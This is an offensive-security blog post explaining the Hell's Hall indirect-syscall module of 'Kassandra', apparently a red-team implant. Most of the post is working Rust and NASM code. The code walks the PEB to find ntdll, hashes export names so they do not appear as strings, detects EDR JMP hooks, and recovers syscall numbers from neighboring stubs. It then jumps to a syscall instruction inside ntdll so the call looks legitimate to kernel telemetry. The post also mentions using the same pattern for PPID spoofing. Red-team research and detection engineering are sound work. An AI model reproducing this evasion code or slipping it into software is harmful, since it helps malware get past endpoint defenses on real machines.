Hell's Hall: Indirect Syscall Resolution in Rust

Offensive Security Jun 18, 2025

Tags: rust, syscalls, evasion, edr, windows

This post examines Kassandra’s Hell’s Hall implementation, the Rust module the agent uses for all sensitive operations (introduced in the architecture overview). It resolves NT System Service Numbers (SSNs) and syscall instruction addresses from ntdll.dll at runtime: it walks the PEB to find ntdll’s base address, parses the PE export table, detects EDR inline hooks, recovers SSNs from unhooked neighbors when a target function is hooked, and locates syscall instructions inside ntdll (each followed by ret in an intact stub) for indirect invocation. The x64 assembly stubs and build system integration are also covered.

Walking the PEB to Find ntdll

Every Windows process has a Process Environment Block (PEB) accessible through the GS segment register on x64 [1]. The PEB contains a pointer to the PEB_LDR_DATA structure, which maintains linked lists of loaded modules [2]. Kassandra reads the second entry in the InMemoryOrderModuleList to find ntdll.dll, relying on the fact that on current Windows versions ntdll is the second entry in that list (after the executable itself). The code does not verify the module name, so it depends on that ordering holding:

// From: kassandra/src/hellshall/mod.rs
fn init_ntdll_config_structure() -> bool {
    unsafe {
        let peb = __readgsqword(0x60) as *const PEB;
        if peb.is_null() || (*peb).OSMajorVersion != 0xA {
            return false;
        }

        let ldr_entry = {
            let first_flink = (*(*peb).Ldr).InMemoryOrderModuleList.Flink;
            let second_flink = (*first_flink).Flink;
            (second_flink as *const u8).offset(-0x10) as *const LDR_DATA_TABLE_ENTRY
        };

        let u_module = (*ldr_entry).DllBase as ULONG_PTR;
        if u_module == 0 {
            return false;
        }
        // ...
    }
}

The __readgsqword(0x60) call reads the PEB pointer from GS:[0x60] [1]. The offset 0x60 is specific to x64; on x86, the PEB is at FS:[0x30]. The code also checks OSMajorVersion == 0xA to verify this is Windows 10 or later.

The InMemoryOrderModuleList is a doubly-linked list of LDR_DATA_TABLE_ENTRY structures [2]. The first Flink points to the executable module, the second Flink points to ntdll. The -0x10 offset adjustment converts from the InMemoryOrderLinks list entry position back to the base of the LDR_DATA_TABLE_ENTRY structure, because InMemoryOrderLinks is not the first field in the struct.
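The offset arithmetic can be illustrated with a simplified stand-in for LDR_DATA_TABLE_ENTRY. This is only a sketch, not the winapi definition: ListEntry, LdrEntry, and both helper functions are hypothetical names, and pointer fields are modeled as u64 so the layout matches x64 regardless of the host.

```rust
// Simplified stand-ins for the Windows structures (x64 layout). Only the
// leading fields are modeled; names are hypothetical, not from Kassandra.
#[repr(C)]
#[derive(Default)]
struct ListEntry {
    flink: u64, // pointer-sized on x64
    blink: u64,
}

#[repr(C)]
#[derive(Default)]
struct LdrEntry {
    in_load_order_links: ListEntry,   // offset 0x00
    in_memory_order_links: ListEntry, // offset 0x10
    in_init_order_links: ListEntry,   // offset 0x20
    dll_base: u64,                    // offset 0x30
}

/// Byte distance from the start of an entry to its in-memory-order links.
fn in_memory_links_offset() -> usize {
    let entry = LdrEntry::default();
    let base = &entry as *const LdrEntry as usize;
    let field = &entry.in_memory_order_links as *const ListEntry as usize;
    field - base
}

/// Step back from a pointer to the links field to the start of its entry,
/// which is what the -0x10 adjustment in the excerpt does.
fn entry_from_links(links: *const ListEntry) -> *const LdrEntry {
    (links as *const u8).wrapping_sub(in_memory_links_offset()) as *const LdrEntry
}
```

Because the list pointers refer to the links field rather than to the start of the entry, every node taken from InMemoryOrderModuleList needs this adjustment before its other fields can be read.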

Parsing the PE Export Table

Once ntdll’s base address is known, the code validates the DOS and NT headers, then extracts the export directory to build a lookup table:

// From: kassandra/src/hellshall/mod.rs
        let dos_header = u_module as *const IMAGE_DOS_HEADER;
        if (*dos_header).e_magic != IMAGE_DOS_SIGNATURE {
            return false;
        }

        let nt_headers = (u_module as *const u8).add((*dos_header).e_lfanew as usize)
            as *const IMAGE_NT_HEADERS64;
        if (*nt_headers).Signature != IMAGE_NT_SIGNATURE {
            return false;
        }

        let export_dir = (u_module as *const u8)
            .add((*nt_headers).OptionalHeader.DataDirectory[0].VirtualAddress as usize)
            as *const IMAGE_EXPORT_DIRECTORY;
        if export_dir.is_null() {
            return false;
        }

        G_NTDLL_CONF.u_module = u_module;
        G_NTDLL_CONF.dw_number_of_names = (*export_dir).NumberOfNames;
        G_NTDLL_CONF.pdw_array_of_names =
            (u_module as *const u8).add((*export_dir).AddressOfNames as usize) as *const u32;
        G_NTDLL_CONF.pdw_array_of_addresses =
            (u_module as *const u8).add((*export_dir).AddressOfFunctions as usize) as *const u32;
        G_NTDLL_CONF.pw_array_of_ordinals =
            (u_module as *const u8).add((*export_dir).AddressOfNameOrdinals as usize) as *const u16;

The PE export directory [3] references three arrays: AddressOfNames (RVAs to function name strings), AddressOfNameOrdinals (one index per name, parallel to AddressOfNames), and AddressOfFunctions (RVAs to function entry points, indexed by the value read from AddressOfNameOrdinals rather than by the name’s position). Pointers to these arrays are stored in a global NtdllConfig structure:
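The name-to-address indirection can be sketched with plain slices standing in for the three arrays. The function name resolve_export and the use of string slices instead of RVAs to names are assumptions made for illustration; the real code reads these arrays through raw pointers into ntdll.

```rust
/// Resolve a name to a function RVA the way the export directory does:
/// names[i] pairs with ordinals[i], and ordinals[i] indexes into functions.
/// Hypothetical helper over in-memory slices, not Kassandra's code.
fn resolve_export(
    names: &[&str],
    ordinals: &[u16],
    functions: &[u32],
    target: &str,
) -> Option<u32> {
    // Position of the name in the name table.
    let i = names.iter().position(|n| *n == target)?;
    // The parallel ordinal table gives the index into the function table.
    let ordinal = *ordinals.get(i)? as usize;
    functions.get(ordinal).copied()
}
```

The point of the sketch is that the function table is never indexed by the name position directly; skipping the ordinal lookup returns the wrong entry whenever the two orders differ.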

// From: kassandra/src/hellshall/mod.rs
#[repr(C)]
struct NtdllConfig {
    pdw_array_of_addresses: *const u32,
    pdw_array_of_names: *const u32,
    pw_array_of_ordinals: *const u16,
    dw_number_of_names: u32,
    u_module: ULONG_PTR,
}

This structure is initialized once (lazily, on first use) and cached in a static mut global for all subsequent syscall resolutions.

CRC32 Hashing of Function Names

Rather than storing NT function names as plaintext strings in the binary, Kassandra identifies functions by CRC32 hash, using the reflected CRC-32 polynomial 0xEDB88320 (named SEED in the code, although it is the polynomial rather than an initial value):

// From: kassandra/src/hellshall/mod.rs
const SEED: u32 = 0xEDB88320;

pub fn crc32h(message: &str) -> u32 {
    let g0 = SEED;
    let g1 = g0 >> 1;
    let g2 = g0 >> 2;
    let g3 = g0 >> 3;
    let g4 = g0 >> 4;
    let g5 = g0 >> 5;
    let g6 = (g0 >> 6) ^ g0;
    let g7 = ((g0 >> 6) ^ g0) >> 1;

    let mut crc: i32 = -1;

    for &byte in message.as_bytes() {
        crc ^= byte as i32;

        let c = ((crc << 31) >> 31) as u32 & g7
            ^ ((crc << 30) >> 31) as u32 & g6
            ^ ((crc << 29) >> 31) as u32 & g5
            ^ ((crc << 28) >> 31) as u32 & g4
            ^ ((crc << 27) >> 31) as u32 & g3
            ^ ((crc << 26) >> 31) as u32 & g2
            ^ ((crc << 25) >> 31) as u32 & g1
            ^ ((crc << 24) >> 31) as u32 & g0;

        crc = ((crc as u32) >> 8) as i32 ^ c as i32;
    }

    !(crc as u32)
}

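This is a table-less CRC32 implementation. Instead of indexing a 256-entry lookup table, it processes one input byte per iteration and rebuilds that byte’s table entry on the fly: each of the eight low bits of crc is expanded into an all-ones or all-zeros mask (the (crc << n) >> 31 shift pair on a signed integer) and ANDed with one of the pre-computed constants g0 through g7, and the eight results are XORed together. The caller hashes a function name like "NtQuerySystemInformation", and the lookup loop compares that value against the hash of each name in the export table. The goal is to keep suspicious NT function name strings out of the binary. This only holds if the hash is precomputed or the compiler evaluates the call at build time; a string literal passed to crc32h at runtime may still be emitted into the binary.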
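For comparison, a conventional bit-at-a-time CRC-32 over the same reflected polynomial is sketched below. The name crc32_bitwise is hypothetical. If crc32h is the standard reflected CRC-32, as its constants suggest, the two should return the same value for any input.

```rust
/// Reflected CRC-32 polynomial, the same value the excerpt calls SEED.
const POLY: u32 = 0xEDB8_8320;

/// Reference bit-at-a-time CRC-32 (initial value and final XOR of all ones).
fn crc32_bitwise(data: &[u8]) -> u32 {
    let mut crc: u32 = 0xFFFF_FFFF;
    for &byte in data {
        crc ^= byte as u32;
        for _ in 0..8 {
            // All ones if the low bit is set, all zeros otherwise.
            let mask = (crc & 1).wrapping_neg();
            crc = (crc >> 1) ^ (POLY & mask);
        }
    }
    !crc
}
```

The standard check input "123456789" hashes to 0xCBF43926 with this function, which gives a quick way to test any alternative implementation against a known value.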

The NtSyscall Struct: What Gets Resolved

Each resolved syscall is stored in an NtSyscall structure:

// From: kassandra/src/hellshall/mod.rs
#[repr(C)]
#[derive(Clone, Copy)]
pub struct NtSyscall {
    pub dw_ssn: u32,
    pub dw_syscall_hash: u32,
    pub p_syscall_address: PVOID,
    pub p_syscall_inst_address: PVOID,
}

Four fields capture everything needed to invoke the syscall:

dw_ssn: The System Service Number, the index into the SSDT [4] that identifies which kernel function to call.
dw_syscall_hash: The CRC32 hash of the function name, used for lookup.
p_syscall_address: The address of the function’s entry point in ntdll (used for SSN extraction and hook detection).
p_syscall_inst_address: The address of a syscall instruction in ntdll memory. This is the key to indirect syscalls: instead of executing syscall from the agent’s own code, execution jumps to a syscall instruction inside ntdll’s address space, making the return address appear legitimate to kernel-mode telemetry [5].

Hook Detection and SSN Extraction

The core of Hell’s Hall is the fetch_nt_syscall function. It iterates over ntdll’s export table, matches the target function by CRC32 hash, then inspects the function’s bytes to determine if it is hooked and to extract the SSN.

The Unhooked Case

An unhooked NT syscall stub on x64 Windows has a well-known prologue [4]:

4C 8B D1        mov r10, rcx
B8 XX XX 00 00  mov eax, SSN

The code checks for this exact byte pattern:

// From: kassandra/src/hellshall/mod.rs
                // Check for unhooked syscall
                if *bytes == 0x4C
                    && *bytes.offset(1) == 0x8B
                    && *bytes.offset(2) == 0xD1
                    && *bytes.offset(3) == 0xB8
                    && *bytes.offset(6) == 0x00
                    && *bytes.offset(7) == 0x00
                {
                    let high = *bytes.offset(5);
                    let low = *bytes.offset(4);
                    nt_sys.dw_ssn = ((high as u32) << 8) | low as u32;
                    break;
                }

The SSN is a 16-bit value at bytes 4 and 5 of the stub (little-endian). Bytes 6 and 7 are verified to be zero, which confirms the SSN fits in two bytes (all known SSNs do). When this pattern matches, the function is unhooked and the SSN is extracted directly.
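The same check can be expressed over a byte slice, which makes the bounds explicit. This is a sketch with a hypothetical function name (extract_ssn); the original works on a raw pointer into ntdll and is not written this way.

```rust
/// Return the SSN if `stub` begins with the unhooked prologue
/// `mov r10, rcx; mov eax, imm32` and the upper two immediate bytes are zero.
fn extract_ssn(stub: &[u8]) -> Option<u16> {
    match stub {
        // 4C 8B D1 | B8 lo hi 00 00
        [0x4C, 0x8B, 0xD1, 0xB8, low, high, 0x00, 0x00, ..] => {
            Some(u16::from_le_bytes([*low, *high]))
        }
        _ => None,
    }
}
```

A slice pattern rejects inputs shorter than eight bytes automatically, so no separate length check is needed.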

Hook Detection: The 0xE9 JMP Byte

EDR products hook NT functions by overwriting the first bytes of the stub with a JMP instruction (0xE9) that redirects execution to the EDR’s monitoring code [6]. Kassandra checks for two hook patterns:

Scenario 1: The very first byte is 0xE9 (the function entry point itself is overwritten with a jump).

Scenario 2: Byte 3 is 0xE9 instead of 0xB8, meaning the hook is placed just after the three-byte mov r10, rcx (4C 8B D1). The excerpt below tests only byte 3; it does not re-check that the first three bytes are preserved.

// From: kassandra/src/hellshall/mod.rs
                // Check for hooked syscall - scenario 1 (0xE9 jump)
                if *bytes == 0xE9 {
                    // ... neighbor scanning
                }

                // Check for hooked syscall - scenario 2 (0xE9 jump after 3 bytes)
                if *bytes.offset(3) == 0xE9 {
                    // ... neighbor scanning
                }

When either hook pattern is detected, the function’s SSN cannot be read directly. This is where neighbor scanning comes in.
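The three outcomes (clean, hooked at the entry point, hooked after the register move) can be summarized as a small classifier. StubState and classify_stub are hypothetical names, and this sketch is slightly stricter than the excerpt: for the second scenario it also requires the 4C 8B D1 bytes to be intact.

```rust
#[derive(Debug, PartialEq)]
enum StubState {
    Clean,          // mov r10, rcx; mov eax, imm32 present
    HookedAtEntry,  // E9 at byte 0
    HookedAfterMov, // 4C 8B D1 intact, E9 at byte 3
    Unrecognized,   // anything else, e.g. a different hook style
}

/// Classify the first bytes of an NT stub by the patterns described above.
fn classify_stub(stub: &[u8]) -> StubState {
    match stub {
        [0xE9, ..] => StubState::HookedAtEntry,
        [0x4C, 0x8B, 0xD1, 0xE9, ..] => StubState::HookedAfterMov,
        [0x4C, 0x8B, 0xD1, 0xB8, _, _, 0x00, 0x00, ..] => StubState::Clean,
        _ => StubState::Unrecognized,
    }
}
```

Keeping an explicit Unrecognized case makes it visible when a stub matches none of the known patterns, instead of silently treating it as unhooked.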

Neighbor Scanning: Recovering SSNs from Hooked Functions

The key insight behind neighbor scanning, which Hell’s Hall shares with related techniques like Halo’s Gate [7], is that NT syscall stubs in ntdll are laid out sequentially in memory and their SSNs increase by one from each stub to the next. If an unhooked stub has SSN 24 and the target stub sits 5 stubs below it in memory, the target’s SSN is 29.

When a function is hooked, Kassandra scans neighboring functions in both directions (up and down in memory) looking for an unhooked stub:

// From: kassandra/src/hellshall/mod.rs
                if *bytes == 0xE9 {
                    for idx in 1..=RANGE {
                        let offset_down = (idx as i32 * DOWN) as isize;
                        let offset_up = (idx as i32 * UP) as isize;

                        // Check down
                        if *bytes.offset(offset_down) == 0x4C
                            && *bytes.offset(1 + offset_down) == 0x8B
                            && *bytes.offset(2 + offset_down) == 0xD1
                            && *bytes.offset(3 + offset_down) == 0xB8
                            && *bytes.offset(6 + offset_down) == 0x00
                            && *bytes.offset(7 + offset_down) == 0x00
                        {
                            let high = *bytes.offset(5 + offset_down);
                            let low = *bytes.offset(4 + offset_down);
                            nt_sys.dw_ssn =
                                (((high as u32) << 8) | low as u32).wrapping_sub(idx as u32);
                            break;
                        }

                        // Check up
                        if *bytes.offset(offset_up) == 0x4C
                            && *bytes.offset(1 + offset_up) == 0x8B
                            && *bytes.offset(2 + offset_up) == 0xD1
                            && *bytes.offset(3 + offset_up) == 0xB8
                            && *bytes.offset(6 + offset_up) == 0x00
                            && *bytes.offset(7 + offset_up) == 0x00
                        {
                            let high = *bytes.offset(5 + offset_up);
                            let low = *bytes.offset(4 + offset_up);
                            nt_sys.dw_ssn =
                                (((high as u32) << 8) | low as u32).wrapping_add(idx as u32);
                            break;
                        }
                    }
                }

The constants DOWN = 32 and UP = -32 represent the fixed size of an NT syscall stub (32 bytes) [4]. The search range RANGE = 0xFF means it will scan up to 255 stubs in each direction. When it finds an unhooked neighbor idx stubs below, it subtracts idx from that neighbor’s SSN to recover the target’s SSN. When it finds one idx stubs above, it adds idx.

This works because EDR products typically hook only a subset of NT functions (the security-relevant ones), leaving most stubs untouched. Even if the target function is hooked, there is almost always an unhooked neighbor within a few stubs.
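The arithmetic can be exercised against a synthetic buffer of 32-byte stubs. The sketch below uses bounds-checked slices instead of raw pointer offsets; recover_ssn and clean_ssn are hypothetical names, and the fixed stub size is the same assumption the post describes.

```rust
const STUB_SIZE: usize = 32; // assumed fixed stub size

/// Return the SSN if `stub` starts with the clean prologue.
fn clean_ssn(stub: &[u8]) -> Option<u32> {
    match stub {
        [0x4C, 0x8B, 0xD1, 0xB8, low, high, 0x00, 0x00, ..] => {
            Some(u32::from(u16::from_le_bytes([*low, *high])))
        }
        _ => None,
    }
}

/// Recover the SSN of a hooked stub at byte offset `target` in `image`
/// by looking at neighbors up to `range` stubs away in both directions.
fn recover_ssn(image: &[u8], target: usize, range: usize) -> Option<u32> {
    for idx in 1..=range {
        let step = idx * STUB_SIZE;
        // A neighbor idx stubs below (higher address) has SSN = target + idx.
        if let Some(ssn) = image.get((target + step)..).and_then(clean_ssn) {
            return ssn.checked_sub(idx as u32);
        }
        // A neighbor idx stubs above (lower address) has SSN = target - idx.
        if let Some(ssn) = target
            .checked_sub(step)
            .and_then(|up| image.get(up..))
            .and_then(clean_ssn)
        {
            return Some(ssn + idx as u32);
        }
    }
    None
}
```

Unlike the pointer-based original, this version returns None rather than reading out of bounds when the scan runs past either end of the buffer.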

Finding the syscall Instruction Gadget

The second critical piece for indirect syscalls is a valid syscall; ret instruction sequence inside ntdll’s memory. Rather than executing a syscall instruction from the agent’s own code (which would make the return address point into the agent binary, a telemetry signal), the agent jumps to a syscall instruction inside ntdll itself:

// From: kassandra/src/hellshall/mod.rs
        // looking for a syscall instruction in a neighboring function
        let u_func_address = (nt_sys.p_syscall_address as ULONG_PTR) + 0xFF;
        for z in 0..=RANGE as u32 {
            let x = z + 1;
            let bytes = u_func_address as *const u8;
            if *bytes.offset(z as isize) == 0x0F && *bytes.offset(x as isize) == 0x05 {
                nt_sys.p_syscall_inst_address = (u_func_address + z as usize) as PVOID;
                break;
            }
        }

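The byte sequence 0x0F 0x05 is the x64 syscall instruction [8]. The search starts 0xFF (255) bytes past the target function’s entry point, which with 32-byte stubs lands several stubs further along, and scans forward over 256 candidate offsets. The check matches only the two syscall bytes; it does not verify that a ret (0xC3) follows, although in an intact stub it does. Since every NT stub contains a syscall instruction, the scan reliably finds one nearby.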

The address of this instruction is stored in p_syscall_inst_address and later used by the assembly stub to perform the actual system call.
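A stricter variant of the scan, which also requires the ret byte, can be sketched over a slice. The function name find_syscall_ret and its parameters are hypothetical; the original scans through a raw pointer and matches only 0F 05.

```rust
/// Find the offset of the first `syscall; ret` (0F 05 C3) sequence in `code`,
/// starting at `start` and examining at most `max_scan` candidate offsets.
fn find_syscall_ret(code: &[u8], start: usize, max_scan: usize) -> Option<usize> {
    code.get(start..)?                 // None if start is past the end
        .windows(3)                    // every 3-byte window from start
        .take(max_scan)                // bound the scan length
        .position(|w| matches!(w, [0x0F, 0x05, 0xC3]))
        .map(|i| start + i)            // convert back to an offset in `code`
}
```

Requiring the trailing C3 avoids landing on a 0F 05 pair that happens to occur inside another instruction’s operand bytes, at the cost of missing a syscall instruction that is not immediately followed by ret.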

Validation: All Four Fields Must Be Set

After SSN extraction and gadget scanning, fetch_nt_syscall validates that all fields are populated before returning success:

// From: kassandra/src/hellshall/mod.rs
        nt_sys.dw_ssn != 0
            && !nt_sys.p_syscall_address.is_null()
            && nt_sys.dw_syscall_hash != 0
            && !nt_sys.p_syscall_inst_address.is_null()

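If any step fails (function not found, SSN extraction failed, no syscall gadget located), the caller falls back to a non-syscall path or returns an error. One side effect of the dw_ssn != 0 test is that a function whose SSN is genuinely 0 is also reported as a failure.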
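One way to separate "SSN not resolved" from "SSN is zero" is to carry the SSN as an Option. The sketch below is an alternative design, not Kassandra’s struct: ResolvedSyscall and its field names are hypothetical, and addresses are modeled as usize for portability.

```rust
/// Hypothetical variant of the resolved-syscall record in which an
/// unresolved SSN is represented by None instead of by the value 0.
#[derive(Debug, Default)]
struct ResolvedSyscall {
    ssn: Option<u32>,   // None until extraction succeeds; Some(0) is valid
    hash: u32,          // CRC32 of the function name
    func_addr: usize,   // stub entry point
    gadget_addr: usize, // address of a syscall instruction in ntdll
}

impl ResolvedSyscall {
    /// True only when every field needed for invocation has been populated.
    fn is_complete(&self) -> bool {
        self.ssn.is_some()
            && self.hash != 0
            && self.func_addr != 0
            && self.gadget_addr != 0
    }
}
```

The trade-off is a slightly larger struct and a layout that no longer matches a plain C struct, which matters only if the record is shared with non-Rust code.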

The x64 Assembly Stubs: SetSSn and RunSyscall

The actual syscall invocation uses two assembly functions linked from a NASM source file:

; From: kassandra/src/asm/hellsasm.asm
section .data
    wSystemCall         dq 0
    qSyscallInsAdress   dq 0

section .text
    default rel         ; enable RIP-relative addressing

    global SetSSn
    global RunSyscall

SetSSn:
    mov eax, ecx
    mov [rel wSystemCall], rax
    mov r8, rdx
    mov [rel qSyscallInsAdress], r8
    ret

RunSyscall:
    mov rax, rcx
    mov r10, rax
    mov eax, dword [rel wSystemCall]
    jmp qword [rel qSyscallInsAdress]

SetSSn stores two values: the SSN (from ecx, the first argument in the Windows x64 calling convention [9]) into wSystemCall, and the syscall instruction address (from rdx, the second argument) into qSyscallInsAdress. These are module-level variables in the .data section.

RunSyscall performs the actual indirect syscall. It moves the first argument (rcx) into r10 by way of rax (the NT syscall calling convention passes the first argument in r10 and the syscall number in eax [4]), loads the stored SSN into eax, and jumps to the stored syscall instruction address inside ntdll. Because it jumps rather than calls, the stack is left exactly as the Rust caller set it up, and the ret that follows the syscall instruction in ntdll returns straight to that caller. Because the syscall instruction itself executes inside ntdll, the user-mode instruction pointer recorded for the syscall points into ntdll’s .text section rather than into the agent binary.

The default rel directive enables RIP-relative addressing for the data references, which is necessary for position-independent code in x64 executables.

Calling Convention: How Rust Invokes the Stubs

The assembly functions are declared as external C functions in Rust:

// From: kassandra/src/hellshall/mod.rs
unsafe extern "C" {
    pub fn SetSSn(w_system_call: u16, syscall_inst_address: PVOID);
    pub fn RunSyscall(
        arg1: *mut winapi::ctypes::c_void,
        arg2: *mut winapi::ctypes::c_void,
        arg3: *mut winapi::ctypes::c_void,
        arg4: *mut winapi::ctypes::c_void,
        arg5: *mut winapi::ctypes::c_void,
        arg6: *mut winapi::ctypes::c_void,
        arg7: *mut winapi::ctypes::c_void,
        arg8: *mut winapi::ctypes::c_void,
        arg9: *mut winapi::ctypes::c_void,
        arg10: *mut winapi::ctypes::c_void,
        arg11: *mut winapi::ctypes::c_void,
    ) -> winapi::shared::ntdef::NTSTATUS;
}

RunSyscall is declared with 11 *mut c_void parameters, which covers NT syscalls with up to 11 arguments (most take 4 to 8); a syscall with more arguments would need a wider declaration. In the Windows x64 calling convention, the first four arguments are passed in rcx, rdx, r8, and r9, with the rest on the stack [9]. Since RunSyscall only moves rcx into r10 and loads the SSN into eax before jumping to the syscall instruction, the remaining arguments (rdx, r8, r9, and the stack arguments) pass through untouched to the kernel.

A typical call site looks like this:

// From: kassandra/src/checkin.rs
fn get_pid_via_syscall() -> u32 {
    unsafe {
        let hash = crc32h("NtQueryInformationProcess");
        let mut nt_query = NtSyscall::default();

        if !fetch_nt_syscall(hash, &mut nt_query) {
            return 0;
        }

        SetSSn(nt_query.dw_ssn as u16, nt_query.p_syscall_inst_address);

        let mut pbi: PROCESS_BASIC_INFORMATION = zeroed();
        let mut ret_len: u32 = 0;

        let status: NTSTATUS = RunSyscall(
            GetCurrentProcess() as _,
            ProcessBasicInformation as _,
            &mut pbi as *mut _ as _,
            size_of::<PROCESS_BASIC_INFORMATION>() as _,
            &mut ret_len as *mut _ as _,
            ptr::null_mut(), ptr::null_mut(), ptr::null_mut(),
            ptr::null_mut(), ptr::null_mut(), ptr::null_mut()
        );

        if status == 0 {
            pbi.UniqueProcessId as u32
        } else {
            0
        }
    }
}

The pattern is always: resolve the hash, call SetSSn to load the SSN and gadget address, then call RunSyscall with the NT function’s actual parameters (padding unused slots with null pointers). This same pattern is used in the process hardening module to resolve NtQuerySystemInformation and NtOpenProcess for PPID spoofing.
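The null padding at each call site could be factored into a small helper. The sketch below is hypothetical (pad_args and MAX_ARGS are not from the Kassandra source) and models arguments as usize values rather than *mut c_void so that it runs on any platform.

```rust
/// Number of argument slots in the RunSyscall declaration.
const MAX_ARGS: usize = 11;

/// Copy `args` into a fixed-size array, filling unused slots with 0 (null).
/// Returns None if more arguments are supplied than there are slots.
fn pad_args(args: &[usize]) -> Option<[usize; MAX_ARGS]> {
    if args.len() > MAX_ARGS {
        return None;
    }
    let mut padded = [0usize; MAX_ARGS];
    padded[..args.len()].copy_from_slice(args);
    Some(padded)
}
```

A wrapper built on such a helper would make the argument-count limit an explicit error instead of a silent truncation at the call site.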

Build System: Compiling Assembly for GNU and MSVC Targets

The build.rs script handles assembling the syscall stubs for both toolchain targets:

// From: kassandra/build.rs
fn main() {
    let target = env::var("TARGET").expect("Missing TARGET environment variable");
    let out_dir = env::var("OUT_DIR").expect("Missing OUT_DIR environment variable");

    if !target.contains("x86_64") {
        panic!("This build script only supports x86_64 targets.");
    }

    if target.contains("msvc") {
        cc::Build::new()
            .file("src/asm/msvc/hellsasm.asm")
            .compile("hellsasm");
    } else if target.contains("gnu") {
        let sources = ["src/asm/hellsasm.asm"];
        if let Err(e) = nasm_rs::compile_library("hellsasm", &sources) {
            panic!("Failed to compile with NASM [hellsasm]: {}", e);
        }
        for source in &sources {
            println!("cargo:rerun-if-changed={}", source);
        }
        println!("cargo:rustc-link-search=native={}", out_dir);
        println!("cargo:rustc-link-lib=static=hellsasm");
    } else {
        panic!("Unsupported target: {}", target);
    }

    // ...
}

For GNU targets (cross-compilation from Linux with x86_64-pc-windows-gnu), it uses nasm-rs to compile the NASM syntax assembly. For MSVC targets (native Windows builds), it uses the cc crate to invoke MASM on a separate MSVC-syntax source file. Both produce a static library named hellsasm that gets linked into the final binary.

The build script enforces x86_64-only compilation, since the assembly stubs, byte patterns, and SSN extraction logic are all specific to the x64 syscall ABI.
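The target-selection logic can be isolated as a pure function, which makes it testable without running a build. This is a sketch that mirrors the branching in the excerpt; the Assembler enum and select_assembler are hypothetical names, and returning Result instead of panicking is a choice made for the example.

```rust
#[derive(Debug, PartialEq)]
enum Assembler {
    Masm, // MSVC targets, assembled through the cc crate
    Nasm, // GNU targets, assembled through nasm-rs
}

/// Decide which assembler to use from a Rust target triple, using the same
/// substring checks as the build script excerpt.
fn select_assembler(target: &str) -> Result<Assembler, String> {
    if !target.contains("x86_64") {
        return Err(format!("only x86_64 targets are supported: {target}"));
    }
    if target.contains("msvc") {
        Ok(Assembler::Masm)
    } else if target.contains("gnu") {
        Ok(Assembler::Nasm)
    } else {
        Err(format!("unsupported target: {target}"))
    }
}
```

In a build script, main would call this with the TARGET environment variable and panic on Err, keeping the same behavior as the original while leaving the decision itself unit-testable.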

Limitations and Honest Assessment

The 32-byte stub size assumption is not guaranteed. The constants DOWN = 32 and UP = -32 assume every NT syscall stub is exactly 32 bytes. While this holds for all known Windows 10/11 versions, Microsoft could change the stub layout in a future update, which would break neighbor scanning.

Hook detection only covers JMP (0xE9) hooks. Some EDR products use other hooking techniques, such as INT3 breakpoints (0xCC), hardware breakpoints, or VEH-based hooking. These would not be detected by the current byte-pattern checks.

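The global mutable state is not thread-safe. The G_NTDLL_CONF structure is a static mut without synchronization, so if multiple threads called fetch_nt_syscall concurrently during initialization, a data race could occur. The same applies to the wSystemCall and qSyscallInsAdress variables in the assembly module: a second thread calling SetSSn between another thread’s SetSSn and RunSyscall would change which syscall that thread executes. In practice, Kassandra’s single-threaded task loop makes this unlikely but not impossible.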
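For the lazily initialized configuration, the standard library’s OnceLock is one way to get once-only initialization without static mut. The sketch below is an assumption about how that could look, not the current implementation: NtdllConfigSketch is a hypothetical, reduced struct, and addresses are stored as usize because raw pointers are not Sync.

```rust
use std::sync::OnceLock;

/// Reduced, hypothetical stand-in for the cached ntdll configuration.
#[derive(Debug, Clone, Copy)]
struct NtdllConfigSketch {
    module_base: usize,
    number_of_names: u32,
}

/// Initialized at most once, even if several threads race on first use.
static NTDLL_CONF: OnceLock<NtdllConfigSketch> = OnceLock::new();

/// Return the cached configuration, running `init` only on the first call.
fn ntdll_config(init: impl FnOnce() -> NtdllConfigSketch) -> &'static NtdllConfigSketch {
    NTDLL_CONF.get_or_init(init)
}
```

This covers only the Rust-side cache. The two variables in the assembly module would need a separate approach, such as passing the SSN and gadget address to the stub as arguments.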

The syscall gadget search starts at a fixed offset. Starting the 0x0F 0x05 scan at function_address + 0xFF means it looks past the current function’s stub into neighboring memory. This works reliably because ntdll’s .text section contains many syscall instructions close together, but it does not guarantee finding the syscall instruction belonging to the specific function being resolved.

Drafted with LLM assistance from the Kassandra source code, reviewed and verified against the actual implementation.

References

[1] Microsoft, “Thread Environment Block (TEB),” https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-teb

[2] Microsoft, “PEB_LDR_DATA structure,” https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data

[3] Microsoft, “PE Format: Export Directory Table,” https://learn.microsoft.com/en-us/windows/win32/debug/pe-format#export-directory-table

[4] Jurczyk, M. (j00ru), “Windows System Call Tables,” https://j00ru.vexillium.org/syscalls/nt/64/

[5] MDSec, “Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams,” https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

[6] Elastic Security Labs, “Doubling Down: Detecting In-Memory Threats with Kernel ETW Call Stacks,” https://www.elastic.co/security-labs/doubling-down-etw-callstacks

[7] reenz0h (Sektor7), “Halo’s Gate: Twin Sister of Hell’s Gate,” https://blog.sektor7.net/#!res/2021/halosgate.md

[8] Intel, “Intel 64 and IA-32 Architectures Software Developer’s Manual, Volume 2B: SYSCALL,” https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html

[9] Microsoft, “x64 calling convention,” https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention